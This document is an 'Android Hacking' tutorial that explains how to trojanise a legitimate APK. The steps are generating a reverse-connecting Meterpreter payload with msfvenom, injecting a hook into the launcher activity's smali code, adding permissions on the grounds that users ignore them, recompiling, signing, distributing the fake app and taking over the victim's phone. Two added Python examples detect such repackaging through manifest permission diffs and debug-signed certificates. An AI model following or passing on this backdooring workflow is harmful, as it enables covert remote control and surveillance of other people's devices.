SHUBHAM YADAV
IND ANDROID_HACKING By:- Shubham Yadav
Attention Hackers!
When you read this book, we would absolutely LOVE to hear your comments on it.
Is it useful?
Is it well written?
Did you find anything to correct?
Is there anything missing?
Is there anything you want to see more of?
Is there anything you want to see less of?
Thank you!
Table of Contents
Install Instructions
Quick Check
Backdooring App
Decompile the payload and the original apk
Copy the payload files
Hook injection inside ".smali" code
Inject the necessary permissions
Recompile the original apk
Sign the apk
Meterpreter Session
Install Instructions
Quick Check
1. Is Java 1.7 installed? If yes, go to step 2; if not, go to step 3.
2. Does executing java -version on the command line / command prompt return 1.7?
Linux:
1. Download the Linux wrapper script (right click, Save Link As apktool)
2. Download apktool-2 (find the newest here)
3. Make sure you have the 32bit libraries (ia32-libs) downloaded and installed by your Linux package manager, if you are on a 64bit Unix system. (This helps provide support for the 32bit native binary aapt, which is required by apktool.)
4. Rename the downloaded jar to apktool.jar
5. Move both files (apktool.jar & apktool) to /usr/local/bin (root needed)
We will also need some libraries and tools in the following steps, so I think it's better if you
install them right now.
To install the required libraries, enter this command at the console:
Windows:
1. Download Windows wrapper script (Right click, Save Link As apktool.bat )
2. Download apktool_2.2.0.jar (find newest here)
3. Rename downloaded jar to apktool.jar
4. Move both files (apktool.jar & apktool.bat) to your Windows directory (usually C:\Windows)
5. If you do not have access to C:\Windows, you may place the two files anywhere, then add that directory to your Environment Variables System PATH variable.
6. Try running apktool via command prompt
Mac OS X:
1. Download Mac wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Rename downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)
5. Make sure both files are executable ( chmod +x )
6. Try running apktool via cli
Overview:
We know this tutorial is a little bit long, so let me tell you what we are going to do here.
1. Generate the Meterpreter payload
2. Get a clean apk file from any site
3. Decompile the payload and the original apk
4. Copy the payload smali folder to the original apk
5. Inject the hook into the appropriate activity of the original apk
6. Inject the permissions into the AndroidManifest.xml file
7. Re-compile the original apk
8. Sign the apk using Jarsigner
9. Distribute the fake apk file on the network
10. Run the Meterpreter session
11. How to discover it on your network and defend yourself
A payload in Metasploit refers to an exploit module. There are three different types of
payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different
types allow for a great deal of versatility and can be useful across numerous types of
scenarios. Whether or not a payload is staged is represented by '/' in the payload name. For
example, "windows/shell_bind_tcp" is a single payload with no stage, whereas
"windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).
Contents
1- Singles
2- Stagers
3- Stages
Singles:
Singles are payloads that are self-contained and completely standalone. A Single payload
can be something as simple as adding a user to the target system or running calc.exe.
These kinds of payloads are self-contained, so they can be caught with non-metasploit
handlers such as netcat.
Stagers:
Stagers set up a network connection between the attacker and victim and are designed to be
small and reliable. It is difficult to always do both of these well so the result is multiple
similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred
one when necessary.
Stages:
Stages are payload components that are downloaded by Stagers modules. The various
payload stages provide advanced features with no size limits such as Meterpreter, VNC
Injection, and the iPhone ‘ipwn’ Shell.
Msfvenom VS MSFpayload
msfpayload is a command line instance of Metasploit that is used to generate and output all
of the various types of shellcode that are available in Metasploit. The most common use of
this tool is for the generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and options before
finalizing an Exploit Module.
So, after understanding what a payload is, let's generate our payload with the following
command line:
msfvenom --platform android -p android/meterpreter/Payload_Type
LHOST=(IP_Address) LPORT=(Incoming_Port) -o meterpreter.apk
Explanation:
--platform: The platform of the payload (Android, Windows, Linux, ...)
To see what payloads are available from the Framework, you can do:
You can use any one you like; I'm going to use reverse_https as an example.
Replace IP_Address with the IP address to which the payload is going to connect back, i.e.
the IP address of the attacker's system. If you are going to perform this attack over a local
network (e.g. if the victim and attacker are connected to the same WiFi hotspot), your local
IP will suffice. To find out what your local IP is, run the command –
If you are going to perform this attack over the Internet, you have to use your public IP
address, and configure your router properly (set up port forwarding) so that your system is
accessible from the Internet. To know your public IP, just google "My IP" and Google will
help you out.
Replace Incoming_Port with the port no. which you want to be used by the payload to
connect to your system. This can be any valid port except the reserved ones like port 80
(HTTP).
I'm going to use 5555 as an example.
Fill in the appropriate values and MSFVenom will generate a payload "meterpreter.apk" in the root
directory. Note that we specified the output file name using the "-o meterpreter.apk"
argument in the command, so if you like, you can name it anything else.
Backdooring App
Decompile the payload and the original apk:
Now we have to decompile the APKs; for this we are going to use APKTool. It decompiles the
code to a fairly human-readable format and saves it in .smali files, and also successfully
extracts the .xml files. Assuming you have already installed the latest apktool and also
have the original apk file in the root directory, run the following commands –
Note that this folder does not exist, so you have to create it.
Let's search for the activities section in the AndroidManifest.xml file, located inside the
"Desktop/FreeWiFiConnect" folder, using any text editor.
You can use CTRL+F to search for an <activity> tag which contains both the lines –
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
Note this "android:name" attribute's value. In my case, as you can see from the previous
screenshot, it is "com.mentisco.freewificonnect.activity.SplashActivity".
This attribute tells us where we are going to inject the hook: replace each dot in the name
with a slash and add .smali at the end to get the path of its smali file, as in the screenshot.
Hook injection inside .smali code:
Now that we have the name of the activity we want to inject the hook into, let's edit the
.smali code of that activity with vi or gedit.
Now search for the following line in the smali code using CTRL+F –
;->onCreate(Landroid/os/Bundle;)V
When you locate it, paste the following code in the line next to it –
What we are doing here is inserting code which starts the payload alongside the existing
code that is executed when the activity starts. Now, save the edited smali file.
Inject the necessary permissions:
If we do not declare all the additional permissions that our payload is going to need, it
cannot function properly. While installing an app, these permissions are shown to the user.
But most users don't care to read all those boring texts, so we do not have to worry much
about that.
These permissions are also listed in the previously encountered AndroidManifest file. So
let's open the AndroidManifest.xml of both the original app and the payload from the
respective folders. The permissions are mentioned inside <uses-permission> tags as the
attribute 'android:name'. Copy the additional permission lines from the payload's
AndroidManifest to the original app's one, but be careful that there are no duplicates.
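For the analyst looking at the other side of these two steps (the launcher activity that the hook targets, and the permissions merged into the manifest), here is an added Python example, not from this tutorial, that reads decoded AndroidManifest.xml files as apktool d produces them. It reports the launcher activity and the smali path derived from it, and lists the permissions a suspect build declares that the known-good build lacks, including duplicated declarations that a hand-merged manifest often carries. The two manifests, the package com.example.wifi and the high-risk permission list are constructed assumptions.

```python
"""Added example (not from the original tutorial): a defender-side check that
reads a decoded AndroidManifest.xml (as produced by apktool d) and reports
(1) the launcher activity, the class whose onCreate a repackager would hook,
and (2) permissions present in a suspect build that the known-good build lacks.
Sample manifests are constructed inline; package and activity names are made up."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Set

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# Permissions a merged payload typically needs; any of these appearing only in
# the suspect build deserve a close look. (Assumed list, not from the tutorial.)
HIGH_RISK = {
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_CALL_LOG",
}

# Constructed sample: a known-good manifest for a hypothetical app.
ORIGINAL_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wifi">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <application android:label="Example">
        <activity android:name="com.example.wifi.SettingsActivity"/>
        <activity android:name="com.example.wifi.SplashActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

# Constructed sample: the same app after someone merged payload permissions in,
# including a duplicated INTERNET declaration.
SUSPECT_MANIFEST = ORIGINAL_MANIFEST.replace(
    '<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>',
    '<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>\n'
    '    <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n'
    '    <uses-permission android:name="android.permission.READ_SMS"/>\n'
    '    <uses-permission android:name="android.permission.INTERNET"/>',
)


def launcher_activity(manifest_xml: str) -> Optional[str]:
    """Fully qualified name of the activity whose intent-filter carries both
    MAIN and LAUNCHER, or None if there is no such activity."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    for activity in root.iter("activity"):
        for flt in activity.findall("intent-filter"):
            actions = {a.get(NAME_ATTR) for a in flt.findall("action")}
            categories = {c.get(NAME_ATTR) for c in flt.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in categories):
                name = activity.get(NAME_ATTR) or ""
                # Manifests may use the relative ".Foo" form; expand it.
                return package + name if name.startswith(".") else name
    return None


def smali_path(activity_name: str) -> str:
    """Dotted class name -> path of its smali file under apktool's smali/ dir."""
    return "smali/" + activity_name.replace(".", "/") + ".smali"


def permissions(manifest_xml: str) -> Set[str]:
    root = ET.fromstring(manifest_xml)
    return {p.get(NAME_ATTR) for p in root.iter("uses-permission")}


def added_permissions(original_xml: str, suspect_xml: str) -> Dict[str, List[str]]:
    """Permissions the suspect build declares beyond the known-good build,
    split into high-risk and other, plus duplicated declarations."""
    declared = [p.get(NAME_ATTR) for p in ET.fromstring(suspect_xml).iter("uses-permission")]
    added = permissions(suspect_xml) - permissions(original_xml)
    return {
        "high_risk": sorted(added & HIGH_RISK),
        "other": sorted(added - HIGH_RISK),
        "duplicates": sorted({p for p in declared if declared.count(p) > 1}),
    }


if __name__ == "__main__":
    act = launcher_activity(SUSPECT_MANIFEST)
    print("launcher activity:", act, "->", smali_path(act))
    print("added permissions:", added_permissions(ORIGINAL_MANIFEST, SUSPECT_MANIFEST))
```

Run the two functions against a decoded manifest from a build you trust and one from the APK under review; a non-empty "high_risk" or "duplicates" list is the point at which the launcher activity's smali file reported here is worth reading by hand.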
Recompile the original apk:
apktool b Desktop/FreeWiFiConnect
You will now have the compiled apk inside the "Desktop/FreeWiFiConnect/dist" directory.
But we still have one step left to finish the backdoored app, called "signing the apk".
Sign the apk:
In this case we are going to sign the apk using the default Android debug key. Just run the
following command –
Be sure to replace apk_path in the above command with the path to your backdoored
apk file.
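A defender's caveat on the signing step, as an added Python example that is not part of the tutorial: an app that reaches users signed with the stock Android debug key, or with a certificate whose digest does not match the vendor's known release certificate, is a strong repackaging indicator. The example parses the text printed by apksigner verify --print-certs from the Android SDK build-tools; the two sample outputs, the vendor name and the pinned digest are constructed, and the exact output line format and the debug certificate's DN string are assumptions.

```python
"""Added example (not from the tutorial): decide whether an APK's signing
certificate looks like a repackaging tell. It parses the text that
`apksigner verify --print-certs <apk>` prints; the samples and the pinned
digest below are constructed, and the line layout and the debug DN string
are assumptions about the tool and the stock debug keystore."""
import re
import subprocess
from typing import Dict, List, Optional

# Subject the stock debug keystore shipped with the Android SDK uses (assumed).
DEBUG_CERT_DN = "CN=Android Debug, O=Android, C=US"

DN_LINE = re.compile(r"^Signer #(\d+) certificate DN: (.+)$", re.M)
SHA256_LINE = re.compile(r"^Signer #(\d+) certificate SHA-256 digest: ([0-9a-f]{64})$", re.M)

# Constructed sample: what a debug-signed repackaged app would print.
SAMPLE_DEBUG_SIGNED = (
    "Signer #1 certificate DN: CN=Android Debug, O=Android, C=US\n"
    "Signer #1 certificate SHA-256 digest: " + "ab" * 32 + "\n"
    "Signer #1 certificate SHA-1 digest: " + "cd" * 20 + "\n"
)

# Constructed sample: the genuine vendor build, with a made-up release digest.
SAMPLE_RELEASE_SIGNED = (
    "Signer #1 certificate DN: CN=Example Vendor, O=Example, C=US\n"
    "Signer #1 certificate SHA-256 digest: " + "12" * 32 + "\n"
)

# Hypothetical pin: the SHA-256 of the certificate the vendor really ships with.
KNOWN_GOOD_SHA256 = "12" * 32


def parse_signers(output: str) -> Dict[int, Dict[str, str]]:
    """Map signer index -> {'dn': ..., 'sha256': ...} from apksigner text."""
    signers: Dict[int, Dict[str, str]] = {}
    for idx, dn in DN_LINE.findall(output):
        signers.setdefault(int(idx), {})["dn"] = dn.strip()
    for idx, digest in SHA256_LINE.findall(output):
        signers.setdefault(int(idx), {})["sha256"] = digest
    return signers


def assess(output: str, pinned_sha256: Optional[str] = None) -> List[str]:
    """Return a list of findings; an empty list means nothing stood out."""
    findings: List[str] = []
    signers = parse_signers(output)
    if not signers:
        return ["no signer information found"]
    for idx, info in sorted(signers.items()):
        if info.get("dn") == DEBUG_CERT_DN:
            findings.append(f"signer #{idx}: signed with the stock Android debug key")
        if pinned_sha256 and info.get("sha256") != pinned_sha256:
            findings.append(f"signer #{idx}: certificate digest does not match the known-good pin")
    return findings


def assess_apk(path: str, pinned_sha256: Optional[str] = None) -> List[str]:
    """Run apksigner on a real file (needs build-tools on PATH; not used offline)."""
    proc = subprocess.run(["apksigner", "verify", "--print-certs", path],
                          capture_output=True, text=True, check=False)
    return assess(proc.stdout, pinned_sha256)


if __name__ == "__main__":
    print(assess(SAMPLE_DEBUG_SIGNED, KNOWN_GOOD_SHA256))
    print(assess(SAMPLE_RELEASE_SIGNED, KNOWN_GOOD_SHA256))
```

The digest pin is the stronger of the two checks: a repackager can sign with any key they like, but not with the vendor's, so comparing against the certificate fingerprint of a copy you trust catches more than the debug-key test alone.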
Meterpreter Session:
Now, after the victim has received the backdoored app and installed and run it on his phone, you
get a working meterpreter session on his phone!